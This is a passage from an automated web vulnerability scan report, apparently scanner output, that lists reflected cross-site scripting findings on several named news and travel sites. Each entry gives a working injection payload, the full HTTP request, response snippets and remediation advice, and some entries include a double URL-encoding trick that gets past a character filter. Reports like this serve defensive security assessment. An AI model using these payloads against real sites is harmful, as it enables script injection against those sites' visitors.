The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e2e2"-alert(1)-"020debb9333 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/06/new-freeskier-star-alex-schlopy-in-shock-after-big-victory/?3e2e2"-alert(1)-"020debb9333=1 HTTP/1.1
Host: www.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.568. http://www.fanhouse.com/2011/02/06/new-freeskier-star-alex-schlopy-in-shock-after-big-victory/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69097"><script>alert(1)</script>7f8dba89625 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/06/new-freeskier-star-alex-schlopy-in-shock-after-big-victory/?69097"><script>alert(1)</script>7f8dba89625=1 HTTP/1.1
Host: www.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the d7f2b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eab70c602dd2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90cce"><script>alert(1)</script>de66471c512 was submitted in the d7f2b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eab70c602dd2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?d7f2b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eab70c602dd2=190cce"><script>alert(1)</script>de66471c512 HTTP/1.1
Host: www.gadling.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1297024929263-New%7C1360096929263%3B%20s_nrgvo%3DNew%7C1360096929265%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; VWCUK200=L020611/Q64976_12205_5_020611_1_021611_404168x403865x020611x1x1; SVWCUK200=404168_1; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.58dd; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.58dd; _BPL=undefined
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.gadling.com/?d7f2b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eab70c602dd2=190cce"><script>alert(1)</script>de66471c512"/> ...[SNIP]...
1.570. http://www.gadling.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.gadling.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7f2b"><script>alert(1)</script>ab70c602dd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?d7f2b"><script>alert(1)</script>ab70c602dd2=1 HTTP/1.1
Host: www.gadling.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.gadling.com/?d7f2b"><script>alert(1)</script>ab70c602dd2=1"/> ...[SNIP]...
1.571. http://www.gadling.com/2010/11/09/setai-fifth-avenue-opens-in-midtown-manhattan/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0014"><script>alert(1)</script>f02d8e32fa6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/09/setai-fifth-avenue-opens-in-midtown-manhattan/?b0014"><script>alert(1)</script>f02d8e32fa6=1 HTTP/1.1
Host: www.gadling.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the plid request parameter is copied into an HTML comment. The payload ac6d3--><script>alert(1)</script>396efbd1ca8 was submitted in the plid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /clickthrough.jsp?ctyp=Booking&plid=7245874ac6d3--><script>alert(1)</script>396efbd1ca8&ptyp=D&pid=7163112&prv=nd-1036&cr=MC41MHw%3D&url=http%3A%2F%2Fwww.lq.com%2Flq%2Fcoolsavings%2Flmd%2Findex.jsp%3Fiata%3D99020530%26wt.mc_id%3Dsidestep&srch=FFS3uB&orig=HDealSynd&extsS=1297017001463&aid=ustrav&hc=FFS3uB&lid=7163112-FFS3uB&istest=false&rank=127 HTTP/1.1
Host: www.kayak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<html> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta http-equiv="pragma" content="no-cache" /> <meta name="robots" content="noindex,nofollow" /> <head> <title>Error | ...[SNIP]... <!-- java.lang.NumberFormatException: For input string: "7245874ac6d3--><script>alert(1)</script>396efbd1ca8" at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48) at java.lang.Integer.parseInt(Integer.java:458) at java.lang.Integer.parseInt(Integer.java:499) at com.r9.purveyor ...[SNIP]...
1.573. http://www.kitchendaily.com/chefs/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.kitchendaily.com
Path: /chefs/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc258"><script>alert(1)</script>960b49903a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /chefs/?bc258"><script>alert(1)</script>960b49903a6=1 HTTP/1.1
Host: www.kitchendaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.574. http://www.kitchendaily.com/recipes/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.kitchendaily.com
Path: /recipes/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15c75</script><a>f0ef4344fb5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /recipes/?15c75</script><a>f0ef4344fb5=1 HTTP/1.1
Host: www.kitchendaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
} var s_account="timeaolfood,aolsvc"; (function(){
...[SNIP]...
1.575. http://www.luxist.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.luxist.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50507"-alert(1)-"f0b7cb9d521 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?50507"-alert(1)-"f0b7cb9d521=1 HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.576. http://www.luxist.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.luxist.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10976"><script>alert(1)</script>55a7c5f9e2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?10976"><script>alert(1)</script>55a7c5f9e2c=1 HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Luxury News from Lux ...[SNIP]... <link rel="canonical" href="http://www.luxist.com/?10976"><script>alert(1)</script>55a7c5f9e2c=1"/> ...[SNIP]...
1.577. http://www.luxist.com/2011/02/06/louis-vuitton-voyagez-tambour-automatic-chronograph-tachometer-w/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24317"><script>alert(1)</script>d7820b72f76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/06/louis-vuitton-voyagez-tambour-automatic-chronograph-tachometer-w/?24317"><script>alert(1)</script>d7820b72f76=1 HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml xmlns:og="http://opengraphprotocol.o ...[SNIP]... <link rel="canonical" href="http://www.luxist.com/2011/02/06/louis-vuitton-voyagez-tambour-automatic-chronograph-tachometer-w/?24317"><script>alert(1)</script>d7820b72f76=1"/> ...[SNIP]...
1.578. http://www.luxist.com/2011/02/06/louis-vuitton-voyagez-tambour-automatic-chronograph-tachometer-w/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4ba8"-alert(1)-"63a6b2d9e21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/06/louis-vuitton-voyagez-tambour-automatic-chronograph-tachometer-w/?b4ba8"-alert(1)-"63a6b2d9e21=1 HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.579. http://www.luxist.com/2011/02/06/oakridge-drive-estate-of-the-day/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.luxist.com
Path: /2011/02/06/oakridge-drive-estate-of-the-day/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2798e"><script>alert(1)</script>7df4d147f33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/06/oakridge-drive-estate-of-the-day/?2798e"><script>alert(1)</script>7df4d147f33=1 HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml xmlns:og="http://opengraphprotocol.o ...[SNIP]... <link rel="canonical" href="http://www.luxist.com/2011/02/06/oakridge-drive-estate-of-the-day/?2798e"><script>alert(1)</script>7df4d147f33=1"/> ...[SNIP]...
1.580. http://www.luxist.com/2011/02/06/oakridge-drive-estate-of-the-day/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.luxist.com
Path: /2011/02/06/oakridge-drive-estate-of-the-day/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6720b"-alert(1)-"4621b68b7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/06/oakridge-drive-estate-of-the-day/?6720b"-alert(1)-"4621b68b7a=1 HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml xmlns:og="http://opengraphprotocol.o ...[SNIP]... "; s_265.linkInternalFilters="javascript:,luxist.com"; s_265.mmxgo = true; s_265.prop1="Lifestyle"; s_265.prop2="Post"; s_265.prop12="http://www.luxist.com/2011/02/06/oakridge-drive-estate-of-the-day/?6720b"-alert(1)-"4621b68b7a=1"; s_265.prop16="Oakridge Drive, Estate of the Day"; s_265.prop17=""; s_265.prop18=""; s_265.prop19=""; s_265.prop20=""; s_265.prop21="dtc"; s_265.prop22="14"; s_265.prop9="bsd:19828098";
var s_code ...[SNIP]...
1.581. http://www.luxist.com/2011/02/06/rare-batman-pages-saved-from-trash-could-sell-for-thousands/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71d32"-alert(1)-"3f416f5c377 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/06/rare-batman-pages-saved-from-trash-could-sell-for-thousands/?71d32"-alert(1)-"3f416f5c377=1 HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml xmlns:og="http://opengraphprotocol.o ...[SNIP]... s="javascript:,luxist.com"; s_265.mmxgo = true; s_265.prop1="Lifestyle"; s_265.prop2="Post"; s_265.prop12="http://www.luxist.com/2011/02/06/rare-batman-pages-saved-from-trash-could-sell-for-thousands/?71d32"-alert(1)-"3f416f5c377=1"; s_265.prop16="Rare Batman Pages Saved From Trash Could Sell For Thousands"; s_265.prop17=""; s_265.prop18=""; s_265.prop19=""; s_265.prop20=""; s_265.prop21="dtc"; s_265.prop22="14"; s_265.prop9=" ...[SNIP]...
1.582. http://www.luxist.com/2011/02/06/rare-batman-pages-saved-from-trash-could-sell-for-thousands/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b178a"><script>alert(1)</script>c1c09125490 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/06/rare-batman-pages-saved-from-trash-could-sell-for-thousands/?b178a"><script>alert(1)</script>c1c09125490=1 HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 78a25%253cscript%253ealert%25281%2529%253c%252fscript%253efa58376a4a1 was submitted in the REST URL parameter 2. This input was echoed as 78a25<script>alert(1)</script>fa58376a4a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/CelebrityRealEstate78a25%253cscript%253ealert%25281%2529%253c%252fscript%253efa58376a4a1/ HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff429"-alert(1)-"985d303e38f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag/CelebrityRealEstateff429"-alert(1)-"985d303e38f/ HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db4a6"><a>69112ad71cf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tag/CelebrityRealEstatedb4a6"><a>69112ad71cf/ HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>CelebrityRealEstated ...[SNIP]... <link rel="canonical" href="http://www.luxist.com/tag/CelebrityRealEstatedb4a6"><a>69112ad71cf/"/> ...[SNIP]...
1.586. http://www.luxist.com/tag/CelebrityRealEstate/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.luxist.com
Path: /tag/CelebrityRealEstate/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2df48"-alert(1)-"b347019b714 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag/CelebrityRealEstate/?2df48"-alert(1)-"b347019b714=1 HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.587. http://www.luxist.com/tag/CelebrityRealEstate/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.luxist.com
Path: /tag/CelebrityRealEstate/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79878"><script>alert(1)</script>aa82c4ce43a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/CelebrityRealEstate/?79878"><script>alert(1)</script>aa82c4ce43a=1 HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d6ce"><a>a5449adeaf1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tag/condo+auction3d6ce"><a>a5449adeaf1/ HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7fe77%253cscript%253ealert%25281%2529%253c%252fscript%253e97357d9c408 was submitted in the REST URL parameter 2. This input was echoed as 7fe77<script>alert(1)</script>97357d9c408 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/condo+auction7fe77%253cscript%253ealert%25281%2529%253c%252fscript%253e97357d9c408/ HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28cef"-alert(1)-"fa384cc80ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag/condo+auction28cef"-alert(1)-"fa384cc80ed/ HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.591. http://www.luxist.com/tag/condo+auction/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.luxist.com
Path: /tag/condo+auction/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3548a"-alert(1)-"f1350bfa9ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag/condo+auction/?3548a"-alert(1)-"f1350bfa9ff=1 HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.592. http://www.luxist.com/tag/condo+auction/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.luxist.com
Path: /tag/condo+auction/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba002"><script>alert(1)</script>16b93e32b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/condo+auction/?ba002"><script>alert(1)</script>16b93e32b8=1 HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b50a8"><a>72d449c7437 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tag/hoteldealsb50a8"><a>72d449c7437/ HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a294d"-alert(1)-"322776735d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag/hoteldealsa294d"-alert(1)-"322776735d/ HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 11a76%253cscript%253ealert%25281%2529%253c%252fscript%253e03d60e24d1f was submitted in the REST URL parameter 2. This input was echoed as 11a76<script>alert(1)</script>03d60e24d1f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/hoteldeals11a76%253cscript%253ealert%25281%2529%253c%252fscript%253e03d60e24d1f/ HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Hoteldeals11a76alert ...[SNIP]... <h1 class="small">hoteldeals11a76<script>alert(1)</script>03d60e24d1f</h1> ...[SNIP]...
1.596. http://www.luxist.com/tag/hoteldeals/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.luxist.com
Path: /tag/hoteldeals/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81546"-alert(1)-"0019621368a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag/hoteldeals/?81546"-alert(1)-"0019621368a=1 HTTP/1.1
Host: www.luxist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.597. http://www.luxist.com/tag/hoteldeals/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.luxist.com
Path: /tag/hoteldeals/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9977d"><script>alert(1)</script>da0051c4140 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
